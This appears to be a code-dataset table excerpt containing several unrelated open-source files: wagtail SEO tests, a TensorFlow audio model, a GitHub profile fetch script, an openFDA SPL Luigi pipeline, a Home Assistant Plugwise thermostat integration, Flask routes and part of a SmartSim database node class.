max_stars_repo_path stringlengths 3 269 | max_stars_repo_name stringlengths 4 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.05M | score float64 0.23 5.13 | int_score int64 0 5 |
|---|---|---|---|---|---|---|
tests/unit/test_wagtail_hooks.py | LUKKIEN/wagtail-marketing-addons | 16 | 12760251 | <gh_stars>10-100
import pytest
from django.utils.html import format_html
from wagtail.core.models import Page
from tests.factories.page import PageFactory
from wagtail_marketing.helpers import SeoHelper
from wagtail_marketing.wagtail_hooks import SeoListingAdmin
@pytest.mark.django_db
class TestSeoListingAdmin:
    """Unit tests for the ``SeoListingAdmin`` Wagtail model-admin class."""

    def setup(self):
        # pytest calls setup() before every test method: fresh admin instance.
        self.seolist = SeoListingAdmin()

    def test_seo_helper(self):
        # seo_helper() wraps a Page in a SeoHelper exposing its SEO fields.
        page = PageFactory()
        result = self.seolist.seo_helper(page)
        assert isinstance(result, SeoHelper)
        assert result.seo_title == page.seo_title
        assert result.search_description == page.search_description
        assert result.page_title == page.title

    def test_admin_display_title(self):
        # NOTE(review): assumes PageFactory builds pages titled 'Title' --
        # confirm against the factory definition.
        page = PageFactory()
        result = self.seolist.admin_display_title(page)
        assert result == 'Title'

    def test_search_engine(self):
        # The listing renders a bold SEO title above the search description.
        page = PageFactory()
        result = self.seolist.search_engine(page)
        assert result == format_html(
            '<strong>{}</strong><p>{}</p>',
            page.seo_title,
            page.search_description
        )

    def test_score(self):
        # NOTE(review): presumably a factory page with no SEO data gets the
        # lowest score emoji -- confirm against SeoHelper's scoring rules.
        page = PageFactory()
        result = self.seolist.score(page)
        assert result == format_html('<span style="font-size: 28px;">{}</span>', '😱')

    def test_get_queryset_root(self, client):
        # NOTE(review): depth == 1 is the Wagtail root page, which appears to
        # be excluded from the listing queryset -- verify.
        Page.objects.all().delete()
        page = PageFactory(depth=1)
        page.save()
        result = self.seolist.get_queryset(client.request())
        assert len(result) == 0

    def test_get_queryset(self, client):
        # A regular (non-root) page must appear in the listing.
        Page.objects.all().delete()
        page = PageFactory()
        result = self.seolist.get_queryset(client.request())
        assert len(result) == 1
        assert result[0] == page
| 2.25 | 2 |
model.py | MeetDevin/WebCrawler | 3 | 12760252 | # coding: utf-8
# ---
# @File: model.py
# @description: 模型类
# @Author: <NAME>
# @E-mail: <EMAIL>
# @Time: 3月18, 2019
# ---
import tensorflow as tf
from PIL import Image
import scipy.misc
import os
from linear_3d_layer import Linear3DLayer
class Model_X(tf.keras.Model):
    """Time-frequency classifier, subclass of ``tf.keras.Model``.

    Three ``Linear3DLayer`` blocks (each followed by batch normalisation and
    3-D max pooling) feed a two-layer GRU; the final state of the second GRU
    is returned directly as the logits.
    """

    def __init__(self, rnn_units, num_class):
        """Build all layers.

        :param rnn_units: hidden-state size of the first GRU layer
        :param num_class: number of classes; also the width of the second
            GRU, whose last hidden state doubles as the logits
        """
        super(Model_X, self).__init__()
        self.rnn_units = rnn_units
        self.num_class = num_class
        self.i = 0  # batch counter used when dumping hidden feature maps

        # Linear (time-frequency frame) layers
        self.lcl1 = Linear3DLayer(filters=8, kernel_size=[1, 3, 75, 6],
                                  activate_size=[3, 1, 2], activate_stride=[3, 1, 1])
        self.lcl2 = Linear3DLayer(filters=8, kernel_size=[8, 3, 36, 3],
                                  activate_size=[3, 1, 2], activate_stride=[3, 1, 1])
        self.lcl3 = Linear3DLayer(filters=8, kernel_size=[8, 3, 17, 2],
                                  activate_size=[3, 1, 1], activate_stride=[3, 1, 1])

        # Max-pooling layers (channels-first layout)
        self.pooling1 = tf.keras.layers.MaxPool3D(pool_size=[2, 2, 2], strides=[2, 2, 2], padding='same',
                                                  data_format='channels_first')
        self.pooling2 = tf.keras.layers.MaxPool3D(pool_size=[2, 2, 2], strides=[2, 2, 2], padding='same',
                                                  data_format='channels_first')
        self.pooling3 = tf.keras.layers.MaxPool3D(pool_size=[2, 2, 2], strides=[2, 2, 2], padding='same',
                                                  data_format='channels_first')

        # GRU network; the second layer's width equals the class count so
        # its last state can serve directly as the logits.
        self.cell1 = tf.keras.layers.GRU(units=self.rnn_units, return_sequences=True)
        self.cell2 = tf.keras.layers.GRU(units=self.num_class)

        # One BatchNormalization instance per linear block.
        self.bn1 = tf.keras.layers.BatchNormalization()
        self.bn2 = tf.keras.layers.BatchNormalization()
        self.bn3 = tf.keras.layers.BatchNormalization()

    def call(self, inputs, drop_rate=0.3, **kwargs):
        """Forward pass.

        Three linear time-frequency layers interleaved with batch norm and
        pooling, then two GRU layers; the last time state of the second GRU
        is returned as the logits.

        :param inputs: tensor shaped [?, 1, 200, 80, 4]
        :param drop_rate: dropout ratio (not used as dropout here; see note)
        :return: logits
        """
        # NOTE(review): training mode is inferred from the dropout argument
        # (drop_rate == 0.3 <=> training) and only drives batch norm --
        # fragile convention, confirm all callers follow it.
        is_training = tf.equal(drop_rate, 0.3)

        lc1 = self.lcl1(inputs)
        lc1 = self.bn1(lc1, training=is_training)
        pool1 = self.pooling1(lc1)  # (?, filters, 99, 39, 4)

        lc2 = self.lcl2(pool1)
        lc2 = self.bn2(lc2, training=is_training)
        pool2 = self.pooling2(lc2)  # (?, filters, 49, 19, 2)

        lc3 = self.lcl3(pool2)
        lc3 = self.bn3(lc3, training=is_training)
        pool3 = self.pooling3(lc3)  # (?, filters, 24, 9, 1)

        pool3 = tf.squeeze(pool3, axis=-1)  # [?, filters, 24, 9]

        if not is_training:
            # self.draw_hid_features(inputs, pool3)  # optional debug dump
            pass

        # Unstack the channel axis and merge the channels into the column
        # axis so the GRU sees one feature vector per time step.
        x_rnns = tf.unstack(pool3, axis=1)  # filters * [?, 17, 10]
        x_rnn = tf.concat(x_rnns, axis=2)   # [?, 17, filters*10]

        cell_out1 = self.cell1(x_rnn)
        logits = self.cell2(cell_out1)
        return logits

    def draw_hid_features(self, inputs, batch):
        """Dump intermediate feature maps under ./hid_pic for inspection.

        Called (when enabled) from ``call`` during evaluation.

        :param inputs: [?, 1, 100, 80, 6]
        :param batch: [?, 8, 13, 10]
        """
        import numpy
        inputs = numpy.squeeze(inputs)  # [?, 100, 80, 6]
        batch = batch.numpy()
        index_sample = 0
        for sample in batch:
            # sample: [8, 13, 10]
            index_channel = 0
            yuan_tus = inputs[index_sample]
            # Stack the input frames side by side as one reference image.
            yuan_tu = numpy.hstack(yuan_tus)
            save_dir = 'hid_pic' + '/batch_' + str(self.i) + '/' + str(index_sample)
            if not os.path.exists(save_dir):
                os.makedirs(save_dir)
            Image.fromarray(yuan_tu).convert('RGB').save(save_dir + '/' + 'yuan_tu.jpg')
            for feature in sample:
                # feature: [13, 10]
                save_path = save_dir + '/' + str(index_channel) + '.jpg'
                # scipy.misc.imsave was removed in SciPy 1.2; write through
                # Pillow instead, matching how yuan_tu is saved above.
                Image.fromarray(feature.T).convert('RGB').save(save_path)
                index_channel += 1
            index_sample += 1
        self.i += 1
############
# 8 16 8
| 2.75 | 3 |
Python/fetch_github_info.py | Brabec/Hacktoberfest2020 | 0 | 12760253 | <filename>Python/fetch_github_info.py
import requests
_GITHUB_API = "https://api.github.com/user"
def fetch_github_info(auth_user, auth_pass):
    """Fetch the authenticated user's GitHub profile.

    :param auth_user: GitHub username for HTTP Basic auth.
    :param auth_pass: password or (preferred) a personal access token --
        GitHub no longer accepts plain account passwords for the API.
    :return: the decoded JSON response as a dict.
    """
    # An explicit timeout keeps the call from hanging forever on network
    # trouble; requests has no default timeout.
    return requests.get(_GITHUB_API, auth=(auth_user, auth_pass), timeout=10).json()


if __name__ == "__main__":
    # Replace the placeholders with real credentials before running.
    for key, value in fetch_github_info("<USERNAME>", "<PASSWORD>").items():
        print(key, value)
| 3.359375 | 3 |
openfda/spl/pipeline.py | rkhaja/openFDA | 0 | 12760254 | #!/usr/bin/python
''' A pipeline for loading SPL data into ElasticSearch
'''
import collections
import csv
import glob
import logging
import os
from os.path import basename, join, dirname
import simplejson as json
import sys
import time
import arrow
import elasticsearch
import luigi
from openfda import common, elasticsearch_requests, index_util, parallel
from openfda.annotation_table.pipeline import CombineHarmonization
from openfda.index_util import AlwaysRunTask
from openfda.spl import annotate
from openfda.parallel import IdentityReducer
# Directory of this file's parent package; used to locate bundled assets.
RUN_DIR = dirname(dirname(os.path.abspath(__file__)))
BASE_DIR = './data'
META_DIR = join(BASE_DIR, 'spl/meta')
# Ensure meta directory is available for task tracking
common.shell_cmd('mkdir -p %s', META_DIR)

# Node.js script that converts one SPL XML document to JSON.
SPL_JS = join(RUN_DIR, 'spl/spl_to_json.js')
# LOINC section-code mapping consumed by the converter script.
LOINC = join(RUN_DIR, 'spl/data/sections.csv')

SPL_S3_BUCKET = 's3://openfda.spl.data/data/'
SPL_S3_LOCAL_DIR = join(BASE_DIR, 'spl/s3_sync')
SPL_S3_CHANGE_LOG = join(SPL_S3_LOCAL_DIR, 'change_log/SPLDocuments.csv')
SPL_BATCH_DIR = join(META_DIR, 'batch')
SPL_PROCESS_DIR = join(BASE_DIR, 'spl/batches')

# Create working directories eagerly (module import has side effects).
common.shell_cmd('mkdir -p %s', SPL_S3_LOCAL_DIR)
common.shell_cmd('mkdir -p %s', SPL_PROCESS_DIR)

# Global luigi parameters shared by every task in this pipeline.
ES_HOST = luigi.Parameter('localhost:9200', is_global=True)
SPL_S3_PROFILE = luigi.Parameter(default='openfda', is_global=True)
class SyncS3SPL(AlwaysRunTask):
    """Mirror the SPL S3 bucket into the local data directory."""
    profile = SPL_S3_PROFILE
    bucket = SPL_S3_BUCKET
    local_dir = SPL_S3_LOCAL_DIR

    def _run(self):
        # Delegate to the AWS CLI; `aws s3 sync` only copies changed objects.
        sync_cmd = [
            'aws',
            '--profile=' + self.profile,
            's3',
            'sync',
            self.bucket,
            self.local_dir,
        ]
        common.cmd(sync_cmd)
class CreateBatchFiles(AlwaysRunTask):
    """Split the S3 change log into weekly batch files of SPL ids.

    Each output file ``<YYYYMMDD>.ids`` lists the unique SPL ids of human
    drug labels that changed during the week ending on that date.
    """
    batch_dir = SPL_BATCH_DIR
    change_log_file = SPL_S3_CHANGE_LOG

    def requires(self):
        return SyncS3SPL()

    def output(self):
        return luigi.LocalTarget(self.batch_dir)

    def _run(self):
        output_dir = self.output().path
        common.shell_cmd('mkdir -p %s', output_dir)
        batches = collections.defaultdict(list)

        # `with` closes the change log deterministically; the original
        # leaked the handle.
        with open(self.change_log_file, 'r') as log_file:
            for row in csv.reader(log_file):
                spl_id, spl_type, spl_date = row
                # Only grab the human labels for this index
                if spl_type.lower().find('human') != -1:
                    # All blank dates to be treated as the week of June 1, 2009
                    if not spl_date:
                        spl_date = '20090601120000'
                    date = arrow.get(spl_date, 'YYYYMMDDHHmmss')
                    batches[date.ceil('week')].append(spl_id)

        for batch_date, ids in batches.items():
            batch_file = '%s.ids' % batch_date.format('YYYYMMDD')
            unique_ids = list(set(ids))
            # `with` guarantees the batch file is flushed and closed; the
            # original left the handle open, risking truncated output.
            with open(join(output_dir, batch_file), 'w') as batch_out:
                batch_out.write('\n'.join(unique_ids))
class SPL2JSONMapper(parallel.Mapper):
    """Map an SPL id to its JSON form by running spl_to_json.js on its XML."""
    spl_path = SPL_S3_LOCAL_DIR

    def map(self, _, value, output):
        """Convert one SPL document.

        :param value: SPL id (one line from a weekly batch file)
        :param output: map-reduce collector; keyed by the XML file path
        """
        # Local import keeps the module's top-level import block untouched.
        import subprocess

        value = value.strip()
        xml_file = join(self.spl_path, value, value + '.xml')
        if not os.path.exists(xml_file):
            logging.info('File does not exist, skipping %s', xml_file)
            return
        # Use an argument list instead of an os.popen() shell string: no
        # shell-quoting problems with odd paths, and a non-zero exit from
        # node raises instead of being silently swallowed.
        json_str = subprocess.check_output(['node', SPL_JS, xml_file, LOINC])
        json_obj = json.loads(json_str)
        output.add(xml_file, json_obj)
class SPL2JSON(luigi.Task):
    """Convert one weekly batch of SPL ids into a sharded JSON database."""
    batch = luigi.Parameter()

    def requires(self):
        return CreateBatchFiles()

    def output(self):
        # '<batch dir>/YYYYMMDD.ids' -> '<process dir>/YYYYMMDD/json.db'
        weekly = basename(self.batch).split('.')[0]
        return luigi.LocalTarget(join(SPL_PROCESS_DIR, weekly, 'json.db'))

    def run(self):
        collection = parallel.Collection.from_glob(self.batch, parallel.LineInput)
        parallel.mapreduce(collection,
                           mapper=SPL2JSONMapper(),
                           reducer=parallel.IdentityReducer(),
                           output_prefix=self.output().path)
class AnnotateJSON(luigi.Task):
    """Annotate the weekly JSON database with the harmonization table."""
    batch = luigi.Parameter()

    def requires(self):
        return [SPL2JSON(self.batch), CombineHarmonization()]

    def output(self):
        # Sibling of json.db, same weekly directory.
        json_db_path = self.input()[0].path
        return luigi.LocalTarget(json_db_path.replace('json.db', 'annotated.db'))

    def run(self):
        json_db = self.input()[0].path
        harmonized_file = self.input()[1].path
        parallel.mapreduce(
            input_collection=parallel.Collection.from_sharded(json_db),
            mapper=annotate.AnnotateMapper(harmonized_file),
            reducer=parallel.IdentityReducer(),
            output_prefix=self.output().path,
            num_shards=1,
            map_workers=1)
class ResetElasticSearch(AlwaysRunTask):
    """(Re)load the SPL document mapping into the druglabel ES index."""
    es_host = ES_HOST

    def _run(self):
        es = elasticsearch.Elasticsearch(self.es_host)
        elasticsearch_requests.load_mapping(
            es, 'druglabel.base', 'spl', './schemas/spl_mapping.json')
class LoadJSON(luigi.Task):
    """Index one weekly batch of annotated SPL documents into Elasticsearch."""
    batch = luigi.Parameter()
    es_host = ES_HOST
    # Evaluated once at import, so all LoadJSON instances in a run share the
    # same epoch (used as the index transaction id).
    epoch = time.time()

    def requires(self):
        return [ResetElasticSearch(), AnnotateJSON(self.batch)]

    def output(self):
        # '<meta>/batch/YYYYMMDD.ids' -> '<meta>/complete/YYYYMMDD.done'
        return luigi.LocalTarget(self.batch.replace('.ids', '.done')\
            .replace('batch', 'complete'))

    def run(self):
        # Since we only iterate over dates in the umbrella process, we need to
        # skip batch files that do not exist
        output_file = self.output().path
        if not os.path.exists(self.batch):
            common.shell_cmd('touch %s', output_file)
            return

        input_file = self.input()[1].path
        es = elasticsearch.Elasticsearch(self.es_host)
        # Bulk-load inside an index transaction so a failed run does not
        # leave a partially updated index.
        index_util.start_index_transaction(es, 'druglabel', self.epoch)
        parallel.mapreduce(
            input_collection=parallel.Collection.from_sharded(input_file),
            mapper=index_util.LoadJSONMapper(self.es_host,
                                             'druglabel',
                                             'spl',
                                             self.epoch,
                                             docid_key='set_id',
                                             version_key='version'),
            reducer=parallel.NullReducer(),
            output_prefix='/tmp/loadjson.druglabel',
            num_shards=1,
            map_workers=1)
        index_util.commit_index_transaction(es, 'druglabel')
        # The .done marker makes this task idempotent across pipeline runs.
        common.shell_cmd('touch %s', output_file)
class ProcessBatch(luigi.Task):
    """Umbrella task: load every weekly batch from June 2009 until now."""

    def requires(self):
        first_week = arrow.get('20090601', 'YYYYMMDD').ceil('week')
        last_week = arrow.utcnow().ceil('week')
        for week in arrow.Arrow.range('week', first_week, last_week):
            batch_file = join(SPL_BATCH_DIR, week.format('YYYYMMDD') + '.ids')
            yield LoadJSON(batch_file)
if __name__ == '__main__':
    # Timestamped, source-located log lines for the whole pipeline run.
    fmt_string = '%(created)f %(filename)s:%(lineno)s [%(funcName)s] %(message)s'
    logging.basicConfig(stream=sys.stderr,
                        format=fmt_string,
                        level=logging.INFO)

    # elasticsearch is too verbose by default (logs every successful request)
    logging.getLogger('elasticsearch').setLevel(logging.WARN)
    luigi.run(main_task_cls=ProcessBatch)
| 1.898438 | 2 |
custom_components/plugwise/climate.py | geijt/plugwise-beta | 0 | 12760255 | <filename>custom_components/plugwise/climate.py
"""Plugwise Climate component for Home Assistant."""
import logging
from plugwise.exceptions import PlugwiseException
from homeassistant.components.climate import ClimateEntity, ClimateEntityDescription
from homeassistant.components.climate.const import (
CURRENT_HVAC_COOL,
CURRENT_HVAC_HEAT,
CURRENT_HVAC_IDLE,
HVAC_MODE_AUTO,
HVAC_MODE_HEAT,
HVAC_MODE_COOL,
HVAC_MODE_OFF,
PRESET_AWAY,
PRESET_HOME,
PRESET_NONE,
SUPPORT_PRESET_MODE,
SUPPORT_TARGET_TEMPERATURE,
)
from homeassistant.const import ATTR_NAME, ATTR_TEMPERATURE, TEMP_CELSIUS
from homeassistant.core import callback
from .const import (
API,
CLIMATE_DOMAIN,
COORDINATOR,
DEFAULT_MAX_TEMP,
DEFAULT_MIN_TEMP,
DOMAIN,
FW,
MASTER_THERMOSTATS,
PW_CLASS,
PW_LOCATION,
PW_MODEL,
SCHEDULE_OFF,
SCHEDULE_ON,
VENDOR,
)
from .gateway import SmileGateway
from .smile_helpers import GWThermostat
HVAC_MODES_HEAT_ONLY = [HVAC_MODE_HEAT, HVAC_MODE_AUTO, HVAC_MODE_OFF]
HVAC_MODES_HEAT_COOL = [HVAC_MODE_HEAT, HVAC_MODE_COOL, HVAC_MODE_AUTO, HVAC_MODE_OFF]
SUPPORT_FLAGS = SUPPORT_TARGET_TEMPERATURE | SUPPORT_PRESET_MODE
_LOGGER = logging.getLogger(__name__)
async def async_setup_entry(hass, config_entry, async_add_entities):
    """Set up the Smile Thermostats from a config entry."""
    api = hass.data[DOMAIN][config_entry.entry_id][API]
    coordinator = hass.data[DOMAIN][config_entry.entry_id][COORDINATOR]

    entities = []
    for dev_id in coordinator.data[1]:
        # Only master thermostat device classes become climate entities;
        # other device classes are handled by other platforms.
        if coordinator.data[1][dev_id][PW_CLASS] not in MASTER_THERMOSTATS:
            continue
        thermostat = PwThermostat(
            api,
            coordinator,
            ClimateEntityDescription(
                key=f"{dev_id}_thermostat",
                name=coordinator.data[1][dev_id].get(ATTR_NAME),
            ),
            dev_id,
            DEFAULT_MAX_TEMP,
            DEFAULT_MIN_TEMP,
        )
        entities.append(thermostat)
        _LOGGER.info(
            "Added climate %s entity", coordinator.data[1][dev_id].get(ATTR_NAME)
        )

    async_add_entities(entities, True)
class PwThermostat(SmileGateway, ClimateEntity):
    """Representation of a Plugwise (zone) thermostat."""

    def __init__(
        self,
        api,
        coordinator,
        description: ClimateEntityDescription,
        dev_id,
        max_temp,
        min_temp,
    ):
        """Set up the PwThermostat.

        :param api: Plugwise Smile API object used for all write commands
        :param coordinator: shared data-update coordinator for this entry
        :param description: HA entity description (key and display name)
        :param dev_id: Plugwise device id backing this entity
        :param max_temp: maximum allowed target temperature (°C)
        :param min_temp: minimum allowed target temperature (°C)
        """
        _cdata = coordinator.data[1][dev_id]
        super().__init__(
            coordinator,
            description,
            dev_id,
            _cdata.get(PW_MODEL),
            description.name,
            _cdata.get(VENDOR),
            _cdata.get(FW),
        )

        # Helper translating raw coordinator data into thermostat state.
        self._gw_thermostat = GWThermostat(coordinator.data, dev_id)

        self._api = api
        # HA entity attributes; refreshed in _async_process_data().
        self._attr_current_temperature = None
        self._attr_device_class = None
        self._attr_hvac_mode = None
        self._attr_max_temp = max_temp
        self._attr_min_temp = min_temp
        self._attr_name = description.name
        self._attr_preset_mode = None
        self._attr_preset_modes = None
        self._attr_supported_features = SUPPORT_FLAGS
        self._attr_target_temperature = None
        self._attr_temperature_unit = TEMP_CELSIUS
        self._attr_unique_id = f"{dev_id}-{CLIMATE_DOMAIN}"
        self._cor_data = coordinator.data
        self._loc_id = _cdata.get(PW_LOCATION)

    @property
    def hvac_action(self):
        """Return the current action."""
        if self._gw_thermostat.heating_state:
            return CURRENT_HVAC_HEAT
        if self._gw_thermostat.cooling_state:
            return CURRENT_HVAC_COOL
        return CURRENT_HVAC_IDLE

    @property
    def hvac_modes(self):
        """Return the available hvac modes list."""
        # COOL is only offered when the gateway reports cooling hardware.
        if self._gw_thermostat.cooling_present:
            return HVAC_MODES_HEAT_COOL
        return HVAC_MODES_HEAT_ONLY

    async def async_set_temperature(self, **kwargs):
        """Set new target temperature."""
        temperature = kwargs.get(ATTR_TEMPERATURE)
        # Reject missing or out-of-range setpoints before calling the API.
        if (temperature is not None) and (
            self._attr_min_temp < temperature < self._attr_max_temp
        ):
            try:
                await self._api.set_temperature(self._loc_id, temperature)
                self._attr_target_temperature = temperature
                self.async_write_ha_state()
                _LOGGER.debug("Set temperature to %s ºC", temperature)
            except PlugwiseException:
                _LOGGER.error("Error while communicating to device")
        else:
            _LOGGER.error("Invalid temperature requested")

    async def async_set_hvac_mode(self, hvac_mode):
        """Set the hvac mode, options are 'off', 'heat', 'cool' and 'auto'."""
        # AUTO means "follow the schedule"; any other mode disables it.
        state = SCHEDULE_OFF
        if hvac_mode == HVAC_MODE_AUTO:
            state = SCHEDULE_ON
            try:
                # Returning to the schedule also restores its setpoint.
                schedule_temp = self._gw_thermostat.schedule_temperature
                await self._api.set_temperature(self._loc_id, schedule_temp)
                self._attr_target_temperature = schedule_temp
            except PlugwiseException:
                _LOGGER.error("Error while communicating to device")

        try:
            await self._api.set_schedule_state(
                self._loc_id, self._gw_thermostat.last_active_schema, state
            )

            # Feature request - mimic HomeKit behavior
            if hvac_mode == HVAC_MODE_OFF:
                preset_mode = PRESET_AWAY
                await self._api.set_preset(self._loc_id, preset_mode)
                self._attr_preset_mode = preset_mode
                # NOTE(review): if preset_mode were absent from presets, the
                # PRESET_NONE fallback indexed with [0] would yield its first
                # character -- confirm presets always contain the mode.
                self._attr_target_temperature = self._gw_thermostat.presets.get(
                    preset_mode, PRESET_NONE
                )[0]
            if (
                hvac_mode in [HVAC_MODE_HEAT, HVAC_MODE_COOL]
                and self._attr_preset_mode == PRESET_AWAY
            ):
                # Leaving OFF: switch back from away to home.
                preset_mode = PRESET_HOME
                await self._api.set_preset(self._loc_id, preset_mode)
                self._attr_preset_mode = preset_mode
                self._attr_target_temperature = self._gw_thermostat.presets.get(
                    preset_mode, PRESET_NONE
                )[0]

            self._attr_hvac_mode = hvac_mode
            self.async_write_ha_state()
            _LOGGER.debug("Set hvac_mode to %s", hvac_mode)
        except PlugwiseException:
            _LOGGER.error("Error while communicating to device")

    async def async_set_preset_mode(self, preset_mode):
        """Set the preset mode."""
        try:
            await self._api.set_preset(self._loc_id, preset_mode)
            self._attr_preset_mode = preset_mode
            self._attr_target_temperature = self._gw_thermostat.presets.get(
                preset_mode, PRESET_NONE
            )[0]
            self.async_write_ha_state()
            _LOGGER.debug("Set preset_mode to %s", preset_mode)
        except PlugwiseException:
            _LOGGER.error("Error while communicating to device")

    @callback
    def _async_process_data(self):
        """Update the data for this climate device."""
        self._gw_thermostat.update_data()

        # Mirror the helper's freshly computed state into the HA attributes.
        self._attr_current_temperature = self._gw_thermostat.current_temperature
        self._attr_extra_state_attributes = self._gw_thermostat.extra_state_attributes
        self._attr_hvac_mode = self._gw_thermostat.hvac_mode
        self._attr_preset_mode = self._gw_thermostat.preset_mode
        self._attr_preset_modes = self._gw_thermostat.preset_modes
        self._attr_target_temperature = self._gw_thermostat.target_temperature

        self.async_write_ha_state()
| 2.078125 | 2 |
blue/developer/routes.py | HishamElamir/WhackHack | 0 | 12760256 | import datetime
from flask import Blueprint, render_template, flash, redirect, request, session, abort, jsonify
from ..core.db import connect
from ..core.db.users import Users
from ..core.db.tasks import Tasks
from ..core.db.task_logs import TaskLogs
from ..core.db.task_assigns import TaskAssigns
from ..core.utils import get_config
# Blueprint holding every /developer route defined in this module.
mod = Blueprint('developer', __name__,
                template_folder='templates', static_folder='static')

# Module-wide database connection shared by all request handlers below.
# NOTE(review): one shared connection across requests assumes the driver is
# thread-safe under the deployed WSGI worker model -- confirm.
dbs = connect()
@mod.route('', methods=['GET', 'POST'])
@mod.route('/', methods=['GET', 'POST'])
def developer__index_dashboard():
    """Render the developer dashboard with per-category/type task stats."""
    user = Users(db=dbs)
    tasks = Tasks(db=dbs)
    task_logs = TaskLogs(db=dbs)  # NOTE(review): currently unused here
    if session.get('logged_in'):
        this_user = user.get_user_by_id(session['user_id'])
        # Chart data: task counts grouped by category and by type.
        categories_labels, categories_count = tasks.get__count__per_category(this_user['_id'])
        types_labels, types_count = tasks.get__count__per_type(this_user['_id'])
        devs_stat = tasks.get__user__per_category()
        if this_user['role'] == 'developer':
            return render_template('dashboard.developer.html', this_user=this_user,
                                   devs_stat=devs_stat,
                                   categories={'key': categories_labels, 'value': categories_count},
                                   types={'key': types_labels, 'value': types_count})
        else:
            # Logged in but not a developer: back to the landing page.
            return redirect('/')
    else:
        return redirect('/')
@mod.route('/tasklog/<task>', methods=['GET', 'POST'])
@mod.route('/tasklog/<task>/', methods=['GET', 'POST'])
def developer__task_log(task):
    """Show or record the developer's log for a single task.

    GET renders the log form for the assigned task; POST stores the
    submitted log entry and returns to the developer dashboard.
    """
    # Check the session *before* touching session['user_id']: the original
    # read the user id first, which raised KeyError for anonymous visitors
    # instead of redirecting them.
    if not session.get('logged_in'):
        return redirect('/')
    user = Users(db=dbs)
    this_user = user.get_user_by_id(session['user_id'])
    if this_user['role'] != 'developer':
        return redirect('/')

    if request.method == 'POST':
        log_task = Tasks(db=dbs)
        log_task.fill_developer_log(request.form, task)
        return redirect('/developer/')

    tasks = Tasks(db=dbs)
    task_assigned = tasks.get_tasks__assigned__by_id(task)
    return render_template('task_log.developer.html', user_id=this_user['_id'],
                           task_assigned=task_assigned)
@mod.route('/create-ticket', methods=['GET', 'POST'])
@mod.route('/create-ticket/', methods=['GET', 'POST'])
def developer__create_task():
    """Render the ticket-creation form; persist a new ticket on POST."""
    user = Users(db=dbs)
    task = Tasks(db=dbs)
    # Guard clauses: anonymous users and non-developers go home.
    if not session.get('logged_in'):
        return redirect('/')
    this_user = user.get_user_by_id(session['user_id'])
    if this_user['role'] != 'developer':
        return redirect('/')

    if request.method == 'POST':
        task.insert(request.form, this_user['_id'])
    # Both GET and a successful POST land back on the creation form.
    return render_template('create_task.developer.html', this_user=this_user)
@mod.route('/view-ticket', methods=['GET', 'POST'])
@mod.route('/view-ticket/', methods=['GET', 'POST'])
def developer__view_task():
    """List every ticket belonging to the logged-in developer."""
    user = Users(db=dbs)
    task = Tasks(db=dbs)
    # Guard clauses: anonymous users and non-developers go home.
    if not session.get('logged_in'):
        return redirect('/')
    this_user = user.get_user_by_id(session['user_id'])
    if this_user['role'] != 'developer':
        return redirect('/')

    task_list = task.get_tasks__user_id(this_user['_id'])
    return render_template('view_task.developer.html',
                           this_user=this_user, task_list=task_list)
| 2.078125 | 2 |
smartsim/entity/dbnode.py | billschereriii/SmartSim | 0 | 12760257 | # BSD 2-Clause License
#
# Copyright (c) 2021-2022, Hewlett Packard Enterprise
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import os.path as osp
import time
from ..error import SmartSimError
from ..log import get_logger
from .entity import SmartSimEntity
logger = get_logger(__name__)
class DBNode(SmartSimEntity):
    """DBNode objects are the entities that make up the orchestrator.

    Each database node can be launched in a cluster configuration
    and take launch multiple databases per node.

    To configure how each instance of the database operates, look
    into the smartsimdb.conf.
    """

    def __init__(self, name, path, run_settings, ports):
        """Initialize a database node within an orchestrator.

        :param name: name of this node entity
        :param path: directory where output and config files are written
        :param run_settings: launcher run settings for this node
        :param ports: list of ports the database listens on
        """
        self.ports = ports
        self._host = None
        super().__init__(name, path, run_settings)
        # MPMD mode: one entity launching multiple shards (e.g. on LSF).
        self._mpmd = False
        self._shard_ids = None
        self._hosts = None

    @property
    def host(self):
        # Lazily parsed from this node's output file on first access.
        if not self._host:
            self._host = self._parse_db_host()
        return self._host

    @property
    def hosts(self):
        # Lazily parsed; only meaningful when self._mpmd is True.
        if not self._hosts:
            self._hosts = self._parse_db_hosts()
        return self._hosts

    def set_host(self, host):
        # str() so hostnames and address objects are stored uniformly.
        self._host = str(host)

    def set_hosts(self, hosts):
        self._hosts = [str(host) for host in hosts]

    def remove_stale_dbnode_files(self):
        """This function removes the .conf, .err, and .out files that
        have the same names used by this dbnode that may have been
        created from a previous experiment execution.
        """
        for port in self.ports:
            if not self._mpmd:
                conf_file = osp.join(self.path, self._get_cluster_conf_filename(port))
                if osp.exists(conf_file):
                    os.remove(conf_file)
            else:  # cov-lsf
                # One conf file per shard in MPMD mode.
                conf_files = [
                    osp.join(self.path, filename)
                    for filename in self._get_cluster_conf_filenames(port)
                ]
                for conf_file in conf_files:
                    if osp.exists(conf_file):
                        os.remove(conf_file)

        for file_ending in [".err", ".out", ".mpmd"]:
            file_name = osp.join(self.path, self.name + file_ending)
            if osp.exists(file_name):
                os.remove(file_name)

        if self._mpmd:
            # Per-shard output/error files carry a "_<shard id>" suffix.
            for file_ending in [".err", ".out"]:
                for shard_id in self._shard_ids:
